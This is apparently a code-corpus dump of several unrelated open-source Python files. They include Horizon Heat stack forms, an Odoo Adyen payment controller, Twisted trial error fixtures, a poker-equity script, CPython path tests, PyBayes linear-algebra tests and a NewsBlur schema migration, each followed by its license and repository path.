ChangeTemplateForm(TemplateForm): class Meta(object): name = _('Edit Template') help_text = _('Select a new template to re-launch a stack.') stack_id = forms.CharField(label=_('Stack ID'), widget=forms.widgets.HiddenInput) stack_name = forms.CharField(label=_('Stack Name'), widget=forms.TextInput(attrs={'readonly': 'readonly'})) class PreviewTemplateForm(TemplateForm): class Meta(object): name = _('Preview Template') help_text = _('Select a new template to preview a stack.') class CreateStackForm(forms.SelfHandlingForm): param_prefix = '__param_' class Meta(object): name = _('Create Stack') template_data = forms.CharField( widget=forms.widgets.HiddenInput, required=False) template_url = forms.CharField( widget=forms.widgets.HiddenInput, required=False) environment_data = forms.CharField( widget=forms.widgets.HiddenInput, required=False) parameters = forms.CharField( widget=forms.widgets.HiddenInput) stack_name = forms.RegexField( max_length=255, label=_('Stack Name'), help_text=_('Name of the stack to create.'), regex=r"^[a-zA-Z][a-zA-Z0-9_.-]*$", error_messages={'invalid': _('Name must start with a letter and may ' 'only contain letters, numbers, underscores, ' 'periods and hyphens.')}) timeout_mins = forms.IntegerField( initial=60, label=_('Creation Timeout (minutes)'), help_text=_('Stack creation timeout in minutes.')) enable_rollback = forms.BooleanField( label=_('Rollback On Failure'), help_text=_('Enable rollback on create/update failure.'), required=False) def __init__(self, *args, **kwargs): parameters = kwargs.pop('parameters') # special case: load template data from API, not passed in params if(kwargs.get('validate_me')): parameters = kwargs.pop('validate_me') super(CreateStackForm, self).__init__(*args, **kwargs) self._build_parameter_fields(parameters) def _build_parameter_fields(self, template_validate): self.fields['password'] = forms.CharField( label=_('Password for user "%s"') % self.request.user.username, help_text=_('This is required for operations to be performed ' 'throughout the lifecycle of the stack'), widget=forms.PasswordInput()) self.help_text = template_validate['Description'] params = template_validate.get('Parameters', {}) if template_validate.get('ParameterGroups'): params_in_order = [] for group in template_validate['ParameterGroups']: for param in group.get('parameters', []): if param in params: params_in_order.append((param, params[param])) else: # no parameter groups, simply sorted to make the order fixed params_in_order = sorted(params.items()) for param_key, param in params_in_order: field = None field_key = self.param_prefix + param_key field_args = { 'initial': param.get('Default', None), 'label': param.get('Label', param_key), 'help_text': html.escape(param.get('Description', '')), 'required': param.get('Default', None) is None } param_type = param.get('Type', None) hidden = strutils.bool_from_string(param.get('NoEcho', 'false')) if 'CustomConstraint' in param: choices = self._populate_custom_choices( param['CustomConstraint']) field_args['choices'] = choices field = forms.ChoiceField(**field_args) elif 'AllowedValues' in param: choices = map(lambda x: (x, x), param['AllowedValues']) field_args['choices'] = choices field = forms.ChoiceField(**field_args) elif param_type == 'Json' and 'Default' in param: field_args['initial'] = json.dumps(param['Default']) field = forms.CharField(**field_args) elif param_type in ('CommaDelimitedList', 'String', 'Json'): if 'MinLength' in param: field_args['min_length'] = int(param['MinLength']) field_args['required'] = param.get('MinLength', 0) > 0 if 'MaxLength' in param: field_args['max_length'] = int(param['MaxLength']) if hidden: field_args['widget'] = forms.PasswordInput() field = forms.CharField(**field_args) elif param_type == 'Number': if 'MinValue' in param: field_args['min_value'] = int(param['MinValue']) if 'MaxValue' in param: field_args['max_value'] = int(param['MaxValue']) field = forms.IntegerField(**field_args) # heat-api currently returns the boolean type in lowercase # (see https://bugs.launchpad.net/heat/+bug/1361448) # so for better compatibility both are checked here elif param_type in ('Boolean', 'boolean'): field = forms.BooleanField(**field_args) if field: self.fields[field_key] = field @sensitive_variables('password') def handle(self, request, data): prefix_length = len(self.param_prefix) params_list = [(k[prefix_length:], v) for (k, v) in six.iteritems(data) if k.startswith(self.param_prefix)] fields = { 'stack_name': data.get('stack_name'), 'timeout_mins': data.get('timeout_mins'), 'disable_rollback': not(data.get('enable_rollback')), 'parameters': dict(params_list), 'password': data.get('password') } if data.get('template_data'): fields['template'] = data.get('template_data') else: fields['template_url'] = data.get('template_url') if data.get('environment_data'): fields['environment'] = data.get('environment_data') try: api.heat.stack_create(self.request, **fields) messages.success(request, _("Stack creation started.")) return True except Exception: exceptions.handle(request) def _populate_custom_choices(self, custom_type): if custom_type == 'neutron.network': return instance_utils.network_field_data(self.request, True) if custom_type == 'nova.keypair': return instance_utils.keypair_field_data(self.request, True) if custom_type == 'glance.image': return image_utils.image_field_data(self.request, True) if custom_type == 'nova.flavor': return instance_utils.flavor_field_data(self.request, True) return [] class EditStackForm(CreateStackForm): class Meta(object): name = _('Update Stack Parameters') stack_id = forms.CharField( label=_('Stack ID'), widget=forms.widgets.HiddenInput) stack_name = forms.CharField( label=_('Stack Name'), widget=forms.TextInput(attrs={'readonly': 'readonly'})) @sensitive_variables('password') def handle(self, request, data): prefix_length = len(self.param_prefix) params_list = [(k[prefix_length:], v) for (k, v) in six.iteritems(data) if k.startswith(self.param_prefix)] stack_id = data.get('stack_id') fields = { 'stack_name': data.get('stack_name'), 'timeout_mins': data.get('timeout_mins'), 'disable_rollback': not(data.get('enable_rollback')), 'parameters': dict(params_list), 'password': data.get('password') } # if the user went directly to this form, resubmit the existing # template data. otherwise, submit what they had from the first form if data.get('template_data'): fields['template'] = data.get('template_data') elif data.get('template_url'): fields['template_url'] = data.get('template_url') elif data.get('parameters'): fields['template'] = data.get('parameters') try: api.heat.stack_update(self.request, stack_id=stack_id, **fields) messages.success(request, _("Stack update started.")) return True except Exception: exceptions.handle(request) class PreviewStackForm(CreateStackForm): class Meta(object): name = _('Preview Stack Parameters') def __init__(self, *args, **kwargs): self.next_view = kwargs.pop('next_view') super(CreateStackForm, self).__init__(*args, **kwargs) def handle(self, request, data): prefix_length = len(self.param_prefix) params_list = [(k[prefix_length:], v) for (k, v) in six.iteritems(data) if k.startswith(self.param_prefix)] fields = { 'stack_name': data.get('stack_name'), 'timeout_mins': data.get('timeout_mins'), 'disable_rollback': not(data.get('enable_rollback')), 'parameters': dict(params_list), } if data.get('template_data'): fields['template'] = data.get('template_data') else: fields['template_url'] = data.get('template_url') if data.get('environment_data'): fields['environment'] = data.get('environment_data') try: stack_preview = api.heat.stack_preview(self.request, **fields) request.method = 'GET' return self.next_view.as_view()(request, stack_preview=stack_preview) except Exception: exceptions.handle(request)
apache-2.0
levkar/odoo
addons/payment_adyen/controllers/main.py
41
1772
# -*- coding: utf-8 -*- import json import logging import pprint import werkzeug from odoo import http from odoo.http import request _logger = logging.getLogger(__name__) class AdyenController(http.Controller): _return_url = '/payment/adyen/return/' @http.route([ '/payment/adyen/return', ], type='http', auth='none', csrf=False) def adyen_return(self, **post): _logger.info('Beginning Adyen form_feedback with post data %s', pprint.pformat(post)) # debug if post.get('authResult') not in ['CANCELLED']: request.env['payment.transaction'].sudo().form_feedback(post, 'adyen') return_url = post.pop('return_url', '') if not return_url: custom = json.loads(post.pop('merchantReturnData', '{}')) return_url = custom.pop('return_url', '/') return werkzeug.utils.redirect(return_url) @http.route([ '/payment/adyen/notification', ], type='http', auth='none', methods=['POST'], csrf=False) def adyen_notification(self, **post): tx = post.get('merchantReference') and request.env['payment.transaction'].sudo().search([('reference', 'in', [post.get('merchantReference')])], limit=1) if post.get('eventCode') in ['AUTHORISATION'] and tx: states = (post.get('merchantReference'), post.get('success'), tx.state) if (post.get('success') == 'true' and tx.state == 'done') or (post.get('success') == 'false' and tx.state in ['cancel', 'error']): _logger.info('Notification from Adyen for the reference %s: received %s, state is %s', states) else: _logger.warning('Notification from Adyen for the reference %s: received %s but state is %s', states) return '[accepted]'
agpl-3.0
proxysh/Safejumper-for-Mac
buildlinux/env64/lib/python2.7/site-packages/twisted/trial/test/erroneous.py
24
4274
# -*- test-case-name: twisted.trial.test.test_tests -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Definitions of test cases with various interesting error-related behaviors, to be used by test modules to exercise different features of trial's test runner. See the L{twisted.trial.test.test_tests} module docstring for details about how this code is arranged. """ from __future__ import division, absolute_import from twisted.trial import unittest, util from twisted.internet import reactor, protocol, defer class FoolishError(Exception): pass class FailureInSetUpMixin(object): def setUp(self): raise FoolishError("I am a broken setUp method") def test_noop(self): pass class SynchronousTestFailureInSetUp( FailureInSetUpMixin, unittest.SynchronousTestCase): pass class AsynchronousTestFailureInSetUp( FailureInSetUpMixin, unittest.TestCase): pass class FailureInTearDownMixin(object): def tearDown(self): raise FoolishError("I am a broken tearDown method") def test_noop(self): pass class SynchronousTestFailureInTearDown( FailureInTearDownMixin, unittest.SynchronousTestCase): pass class AsynchronousTestFailureInTearDown( FailureInTearDownMixin, unittest.TestCase): pass class TestRegularFail(unittest.SynchronousTestCase): def test_fail(self): self.fail("I fail") def test_subfail(self): self.subroutine() def subroutine(self): self.fail("I fail inside") class TestAsynchronousFail(unittest.TestCase): """ Test failures for L{unittest.TestCase} based classes. """ def test_fail(self): """ A test which fails in the callback of the returned L{defer.Deferred}. """ d = defer.Deferred() d.addCallback(self._later) reactor.callLater(0, d.callback, None) return d def _later(self, res): self.fail("I fail later") def test_exception(self): """ A test which raises an exception synchronously. """ raise Exception("I fail") class ErrorTest(unittest.SynchronousTestCase): """ A test case which has a L{test_foo} which will raise an error. @ivar ran: boolean indicating whether L{test_foo} has been run. """ ran = False def test_foo(self): """ Set C{self.ran} to True and raise a C{ZeroDivisionError} """ self.ran = True 1/0 class TestSkipTestCase(unittest.SynchronousTestCase): pass TestSkipTestCase.skip = "skipping this test" class DelayedCall(unittest.TestCase): hiddenExceptionMsg = "something blew up" def go(self): raise RuntimeError(self.hiddenExceptionMsg) def testHiddenException(self): """ What happens if an error is raised in a DelayedCall and an error is also raised in the test? L{test_reporter.ErrorReportingTests.testHiddenException} checks that both errors get reported. Note that this behaviour is deprecated. A B{real} test would return a Deferred that got triggered by the callLater. This would guarantee the delayed call error gets reported. """ reactor.callLater(0, self.go) reactor.iterate(0.01) self.fail("Deliberate failure to mask the hidden exception") testHiddenException.suppress = [util.suppress( message=r'reactor\.iterate cannot be used.*', category=DeprecationWarning)] class ReactorCleanupTests(unittest.TestCase): def test_leftoverPendingCalls(self): def _(): print('foo!') reactor.callLater(10000.0, _) class SocketOpenTest(unittest.TestCase): def test_socketsLeftOpen(self): f = protocol.Factory() f.protocol = protocol.Protocol reactor.listenTCP(0, f) class TimingOutDeferred(unittest.TestCase): def test_alpha(self): pass def test_deferredThatNeverFires(self): self.methodCalled = True d = defer.Deferred() return d def test_omega(self): pass def unexpectedException(self): """i will raise an unexpected exception... ... *CAUSE THAT'S THE KINDA GUY I AM* >>> 1/0 """
gpl-2.0
aldanor/ray_eval
ngbbtest.py
1
1817
# -*- coding: utf-8 -*- import rayeval import time if __name__ == '__main__': # rayeval.load_handranks('HandRanks.dat') rayeval.load_handranks_9('/usr/local/shared/rayeval_hand_ranks_9.dat') board = 'Ks Jd 9d * *' pockets = ['9s Kd 4d 6c'] iterations = 1e6 t0 = time.time() ngbb = rayeval.eval_turn_outs_vs_random_omaha(board, pockets[0], iterations) elapsed = time.time() - t0 print '[%s]' % pockets, 'on board [%s]' % board print 'Elapsed: %.2f seconds (%.2fM iterations / sec).\n' % (elapsed, iterations / elapsed / 1e6) for item in sorted(ngbb.items(), key=lambda x : x[1], reverse=True): print item flop_ev = ngbb['flop_ev'] outs = ngbb['outs'] nuts = good = blank = bad = 0 for k in outs: ev = outs[k] if ev >= 0.98: nuts = nuts + 1 elif ev >= flop_ev + 0.1: good = good + 1 elif ev <= flop_ev - 0.1: bad = bad + 1 else: blank = blank + 1 print '[Nuts-Good-Blank-Bad] = [%d-%d-%d-%d]' % (nuts, good, blank, bad) print '' import pokereval pockets = pockets + ['* * * *'] t0 = time.time() board_pe = ['__' if b == '*' else b for b in board.split(' ')] pocket_pe = [['__' if c == '*' else c for c in p.split(' ')] for p in pockets] res = pokereval.PokerEval().poker_eval(game='omaha', board=board_pe, pockets=pocket_pe, iterations=int(iterations)) elapsed = time.time() - t0 print '[%s]' % 'pokereval', pockets[:1], 'vs', pockets[1:], 'on board [%s]' % board, ( ': EV = %.4f%% (%.2gM iterations).' % (res['eval'][0]['ev'] / 10., iterations / 1e6)) print 'Elapsed: %.2f seconds (%.2fM iterations / sec).' % ( elapsed, iterations / elapsed / 1e6)
gpl-2.0
blacklin/kbengine
kbe/res/scripts/common/Lib/test/test_genericpath.py
81
16219
""" Tests common to genericpath, macpath, ntpath and posixpath """ import genericpath import os import sys import unittest import warnings from test import support def safe_rmdir(dirname): try: os.rmdir(dirname) except OSError: pass class GenericTest: common_attributes = ['commonprefix', 'getsize', 'getatime', 'getctime', 'getmtime', 'exists', 'isdir', 'isfile'] attributes = [] def test_no_argument(self): for attr in self.common_attributes + self.attributes: with self.assertRaises(TypeError): getattr(self.pathmodule, attr)() raise self.fail("{}.{}() did not raise a TypeError" .format(self.pathmodule.__name__, attr)) def test_commonprefix(self): commonprefix = self.pathmodule.commonprefix self.assertEqual( commonprefix([]), "" ) self.assertEqual( commonprefix(["/home/swenson/spam", "/home/swen/spam"]), "/home/swen" ) self.assertEqual( commonprefix(["/home/swen/spam", "/home/swen/eggs"]), "/home/swen/" ) self.assertEqual( commonprefix(["/home/swen/spam", "/home/swen/spam"]), "/home/swen/spam" ) self.assertEqual( commonprefix(["home:swenson:spam", "home:swen:spam"]), "home:swen" ) self.assertEqual( commonprefix([":home:swen:spam", ":home:swen:eggs"]), ":home:swen:" ) self.assertEqual( commonprefix([":home:swen:spam", ":home:swen:spam"]), ":home:swen:spam" ) self.assertEqual( commonprefix([b"/home/swenson/spam", b"/home/swen/spam"]), b"/home/swen" ) self.assertEqual( commonprefix([b"/home/swen/spam", b"/home/swen/eggs"]), b"/home/swen/" ) self.assertEqual( commonprefix([b"/home/swen/spam", b"/home/swen/spam"]), b"/home/swen/spam" ) self.assertEqual( commonprefix([b"home:swenson:spam", b"home:swen:spam"]), b"home:swen" ) self.assertEqual( commonprefix([b":home:swen:spam", b":home:swen:eggs"]), b":home:swen:" ) self.assertEqual( commonprefix([b":home:swen:spam", b":home:swen:spam"]), b":home:swen:spam" ) testlist = ['', 'abc', 'Xbcd', 'Xb', 'XY', 'abcd', 'aXc', 'abd', 'ab', 'aX', 'abcX'] for s1 in testlist: for s2 in testlist: p = commonprefix([s1, s2]) self.assertTrue(s1.startswith(p)) self.assertTrue(s2.startswith(p)) if s1 != s2: n = len(p) self.assertNotEqual(s1[n:n+1], s2[n:n+1]) def test_getsize(self): f = open(support.TESTFN, "wb") try: f.write(b"foo") f.close() self.assertEqual(self.pathmodule.getsize(support.TESTFN), 3) finally: if not f.closed: f.close() support.unlink(support.TESTFN) def test_time(self): f = open(support.TESTFN, "wb") try: f.write(b"foo") f.close() f = open(support.TESTFN, "ab") f.write(b"bar") f.close() f = open(support.TESTFN, "rb") d = f.read() f.close() self.assertEqual(d, b"foobar") self.assertLessEqual( self.pathmodule.getctime(support.TESTFN), self.pathmodule.getmtime(support.TESTFN) ) finally: if not f.closed: f.close() support.unlink(support.TESTFN) def test_exists(self): self.assertIs(self.pathmodule.exists(support.TESTFN), False) f = open(support.TESTFN, "wb") try: f.write(b"foo") f.close() self.assertIs(self.pathmodule.exists(support.TESTFN), True) if not self.pathmodule == genericpath: self.assertIs(self.pathmodule.lexists(support.TESTFN), True) finally: if not f.close(): f.close() support.unlink(support.TESTFN) @unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()") def test_exists_fd(self): r, w = os.pipe() try: self.assertTrue(self.pathmodule.exists(r)) finally: os.close(r) os.close(w) self.assertFalse(self.pathmodule.exists(r)) def test_isdir(self): self.assertIs(self.pathmodule.isdir(support.TESTFN), False) f = open(support.TESTFN, "wb") try: f.write(b"foo") f.close() self.assertIs(self.pathmodule.isdir(support.TESTFN), False) os.remove(support.TESTFN) os.mkdir(support.TESTFN) self.assertIs(self.pathmodule.isdir(support.TESTFN), True) os.rmdir(support.TESTFN) finally: if not f.close(): f.close() support.unlink(support.TESTFN) safe_rmdir(support.TESTFN) def test_isfile(self): self.assertIs(self.pathmodule.isfile(support.TESTFN), False) f = open(support.TESTFN, "wb") try: f.write(b"foo") f.close() self.assertIs(self.pathmodule.isfile(support.TESTFN), True) os.remove(support.TESTFN) os.mkdir(support.TESTFN) self.assertIs(self.pathmodule.isfile(support.TESTFN), False) os.rmdir(support.TESTFN) finally: if not f.close(): f.close() support.unlink(support.TESTFN) safe_rmdir(support.TESTFN) @staticmethod def _create_file(filename): with open(filename, 'wb') as f: f.write(b'foo') def test_samefile(self): try: test_fn = support.TESTFN + "1" self._create_file(test_fn) self.assertTrue(self.pathmodule.samefile(test_fn, test_fn)) self.assertRaises(TypeError, self.pathmodule.samefile) finally: os.remove(test_fn) @support.skip_unless_symlink def test_samefile_on_symlink(self): self._test_samefile_on_link_func(os.symlink) def test_samefile_on_link(self): self._test_samefile_on_link_func(os.link) def _test_samefile_on_link_func(self, func): try: test_fn1 = support.TESTFN + "1" test_fn2 = support.TESTFN + "2" self._create_file(test_fn1) func(test_fn1, test_fn2) self.assertTrue(self.pathmodule.samefile(test_fn1, test_fn2)) os.remove(test_fn2) self._create_file(test_fn2) self.assertFalse(self.pathmodule.samefile(test_fn1, test_fn2)) finally: os.remove(test_fn1) os.remove(test_fn2) def test_samestat(self): try: test_fn = support.TESTFN + "1" self._create_file(test_fn) test_fns = [test_fn]*2 stats = map(os.stat, test_fns) self.assertTrue(self.pathmodule.samestat(*stats)) finally: os.remove(test_fn) @support.skip_unless_symlink def test_samestat_on_symlink(self): self._test_samestat_on_link_func(os.symlink) def test_samestat_on_link(self): self._test_samestat_on_link_func(os.link) def _test_samestat_on_link_func(self, func): try: test_fn1 = support.TESTFN + "1" test_fn2 = support.TESTFN + "2" self._create_file(test_fn1) test_fns = (test_fn1, test_fn2) func(*test_fns) stats = map(os.stat, test_fns) self.assertTrue(self.pathmodule.samestat(*stats)) os.remove(test_fn2) self._create_file(test_fn2) stats = map(os.stat, test_fns) self.assertFalse(self.pathmodule.samestat(*stats)) self.assertRaises(TypeError, self.pathmodule.samestat) finally: os.remove(test_fn1) os.remove(test_fn2) def test_sameopenfile(self): fname = support.TESTFN + "1" with open(fname, "wb") as a, open(fname, "wb") as b: self.assertTrue(self.pathmodule.sameopenfile( a.fileno(), b.fileno())) class TestGenericTest(GenericTest, unittest.TestCase): # Issue 16852: GenericTest can't inherit from unittest.TestCase # for test discovery purposes; CommonTest inherits from GenericTest # and is only meant to be inherited by others. pathmodule = genericpath # Following TestCase is not supposed to be run from test_genericpath. # It is inherited by other test modules (macpath, ntpath, posixpath). class CommonTest(GenericTest): common_attributes = GenericTest.common_attributes + [ # Properties 'curdir', 'pardir', 'extsep', 'sep', 'pathsep', 'defpath', 'altsep', 'devnull', # Methods 'normcase', 'splitdrive', 'expandvars', 'normpath', 'abspath', 'join', 'split', 'splitext', 'isabs', 'basename', 'dirname', 'lexists', 'islink', 'ismount', 'expanduser', 'normpath', 'realpath', ] def test_normcase(self): normcase = self.pathmodule.normcase # check that normcase() is idempotent for p in ["FoO/./BaR", b"FoO/./BaR"]: p = normcase(p) self.assertEqual(p, normcase(p)) self.assertEqual(normcase(''), '') self.assertEqual(normcase(b''), b'') # check that normcase raises a TypeError for invalid types for path in (None, True, 0, 2.5, [], bytearray(b''), {'o','o'}): self.assertRaises(TypeError, normcase, path) def test_splitdrive(self): # splitdrive for non-NT paths splitdrive = self.pathmodule.splitdrive self.assertEqual(splitdrive("/foo/bar"), ("", "/foo/bar")) self.assertEqual(splitdrive("foo:bar"), ("", "foo:bar")) self.assertEqual(splitdrive(":foo:bar"), ("", ":foo:bar")) self.assertEqual(splitdrive(b"/foo/bar"), (b"", b"/foo/bar")) self.assertEqual(splitdrive(b"foo:bar"), (b"", b"foo:bar")) self.assertEqual(splitdrive(b":foo:bar"), (b"", b":foo:bar")) def test_expandvars(self): if self.pathmodule.__name__ == 'macpath': self.skipTest('macpath.expandvars is a stub') expandvars = self.pathmodule.expandvars with support.EnvironmentVarGuard() as env: env.clear() env["foo"] = "bar" env["{foo"] = "baz1" env["{foo}"] = "baz2" self.assertEqual(expandvars("foo"), "foo") self.assertEqual(expandvars("$foo bar"), "bar bar") self.assertEqual(expandvars("${foo}bar"), "barbar") self.assertEqual(expandvars("$[foo]bar"), "$[foo]bar") self.assertEqual(expandvars("$bar bar"), "$bar bar") self.assertEqual(expandvars("$?bar"), "$?bar") self.assertEqual(expandvars("$foo}bar"), "bar}bar") self.assertEqual(expandvars("${foo"), "${foo") self.assertEqual(expandvars("${{foo}}"), "baz1}") self.assertEqual(expandvars("$foo$foo"), "barbar") self.assertEqual(expandvars("$bar$bar"), "$bar$bar") self.assertEqual(expandvars(b"foo"), b"foo") self.assertEqual(expandvars(b"$foo bar"), b"bar bar") self.assertEqual(expandvars(b"${foo}bar"), b"barbar") self.assertEqual(expandvars(b"$[foo]bar"), b"$[foo]bar") self.assertEqual(expandvars(b"$bar bar"), b"$bar bar") self.assertEqual(expandvars(b"$?bar"), b"$?bar") self.assertEqual(expandvars(b"$foo}bar"), b"bar}bar") self.assertEqual(expandvars(b"${foo"), b"${foo") self.assertEqual(expandvars(b"${{foo}}"), b"baz1}") self.assertEqual(expandvars(b"$foo$foo"), b"barbar") self.assertEqual(expandvars(b"$bar$bar"), b"$bar$bar") @unittest.skipUnless(support.FS_NONASCII, 'need support.FS_NONASCII') def test_expandvars_nonascii(self): if self.pathmodule.__name__ == 'macpath': self.skipTest('macpath.expandvars is a stub') expandvars = self.pathmodule.expandvars def check(value, expected): self.assertEqual(expandvars(value), expected) with support.EnvironmentVarGuard() as env: env.clear() nonascii = support.FS_NONASCII env['spam'] = nonascii env[nonascii] = 'ham' + nonascii check(nonascii, nonascii) check('$spam bar', '%s bar' % nonascii) check('${spam}bar', '%sbar' % nonascii) check('${%s}bar' % nonascii, 'ham%sbar' % nonascii) check('$bar%s bar' % nonascii, '$bar%s bar' % nonascii) check('$spam}bar', '%s}bar' % nonascii) check(os.fsencode(nonascii), os.fsencode(nonascii)) check(b'$spam bar', os.fsencode('%s bar' % nonascii)) check(b'${spam}bar', os.fsencode('%sbar' % nonascii)) check(os.fsencode('${%s}bar' % nonascii), os.fsencode('ham%sbar' % nonascii)) check(os.fsencode('$bar%s bar' % nonascii), os.fsencode('$bar%s bar' % nonascii)) check(b'$spam}bar', os.fsencode('%s}bar' % nonascii)) def test_abspath(self): self.assertIn("foo", self.pathmodule.abspath("foo")) with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) self.assertIn(b"foo", self.pathmodule.abspath(b"foo")) # Abspath returns bytes when the arg is bytes with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) for path in (b'', b'foo', b'f\xf2\xf2', b'/foo', b'C:\\'): self.assertIsInstance(self.pathmodule.abspath(path), bytes) def test_realpath(self): self.assertIn("foo", self.pathmodule.realpath("foo")) with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) self.assertIn(b"foo", self.pathmodule.realpath(b"foo")) def test_normpath_issue5827(self): # Make sure normpath preserves unicode for path in ('', '.', '/', '\\', '///foo/.//bar//'): self.assertIsInstance(self.pathmodule.normpath(path), str) def test_abspath_issue3426(self): # Check that abspath returns unicode when the arg is unicode # with both ASCII and non-ASCII cwds. abspath = self.pathmodule.abspath for path in ('', 'fuu', 'f\xf9\xf9', '/fuu', 'U:\\'): self.assertIsInstance(abspath(path), str) unicwd = '\xe7w\xf0' try: os.fsencode(unicwd) except (AttributeError, UnicodeEncodeError): # FS encoding is probably ASCII pass else: with support.temp_cwd(unicwd): for path in ('', 'fuu', 'f\xf9\xf9', '/fuu', 'U:\\'): self.assertIsInstance(abspath(path), str) def test_nonascii_abspath(self): if (support.TESTFN_UNDECODABLE # Mac OS X denies the creation of a directory with an invalid # UTF-8 name. Windows allows to create a directory with an # arbitrary bytes name, but fails to enter this directory # (when the bytes name is used). and sys.platform not in ('win32', 'darwin')): name = support.TESTFN_UNDECODABLE elif support.TESTFN_NONASCII: name = support.TESTFN_NONASCII else: self.skipTest("need support.TESTFN_NONASCII") with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) with support.temp_cwd(name): self.test_abspath() if __name__=="__main__": unittest.main()
lgpl-3.0
cdondrup/PyBayes
pybayes/tests/test_wrappers_linalg.py
1
1754
# Copyright (c) 2010 Matej Laitl <matej@laitl.cz> # Distributed under the terms of the GNU General Public License v2 or any # later version of the license, at your option. """Tests for wrappers._linalg""" import math import numpy as np import pybayes.wrappers._linalg as linalg from support import PbTestCase def test_inv_func(self): """Work-around so that this function can be annotated in .pxd""" # source data arrays = [ np.array([[ 2.]]), np.array([[ 0., 2.], [ 3., 0.]]), np.array([[ 1., -2.], [-4., 9.]]), np.array([[10., 11.], [100., 111.]]), # near singular np.array([[1., 2., -3.], [1., -2., 3.], [-1., 2., 3.]]) ] # test that A * inv(A) = I within machine precision for A in arrays: iA = linalg.inv(A) E = np.eye(A.shape[0]) E1 = np.dot(A, iA) E2 = np.dot(iA, A) self.assertApproxEqual(E1, E) self.assertApproxEqual(E2, E) def test_slogdet_func(self): """Work-around so that this function can be annotated in .pxd""" arr = np.array([[1., 2.], [-3., 4.]]) res = math.log(linalg.det(arr)) self.assertApproxEqual(res, 2.30258509299) def test_cholesky_func(self): """Work-around so that this function can be annotated in .pxd""" arr = np.array([[ 4., 12., -16.], [ 12., 37., -43.], [-16., -43., 98.]]) res = linalg.cholesky(arr) self.assertApproxEqual(np.dot(res, res.T), arr) class TestWrappersLinalg(PbTestCase): def test_inv(self): test_inv_func(self) def test_slogdet(self): """Test that we emulate slogdet correctly""" test_slogdet_func(self) def test_cholesky(self): test_cholesky_func(self)
gpl-2.0
petecummings/NewsBlur
apps/feed_import/migrations/0004_remote_ip.py
18
5078
# encoding: utf-8 import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding field 'OAuthToken.remote_ip' db.add_column('feed_import_oauthtoken', 'remote_ip', self.gf('django.db.models.fields.CharField')(max_length=50, null=True, blank=True), keep_default=False) # Adding field 'OAuthToken.created_date' db.add_column('feed_import_oauthtoken', 'created_date', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now), keep_default=False) def backwards(self, orm): # Deleting field 'OAuthToken.remote_ip' db.delete_column('feed_import_oauthtoken', 'remote_ip') # Deleting field 'OAuthToken.created_date' db.delete_column('feed_import_oauthtoken', 'created_date') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'contenttypes.contenttype': { 'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, 'feed_import.oauthtoken': { 'Meta': {'object_name': 'OAuthToken'}, 'access_token': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'access_token_secret': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'created_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'remote_ip': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}), 'request_token': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'request_token_secret': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'session_id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'null': 'True', 'blank': 'True'}) } } complete_apps = ['feed_import']
mit
agravier/pycogmo
tests/visualisation_tests.py
1
13926
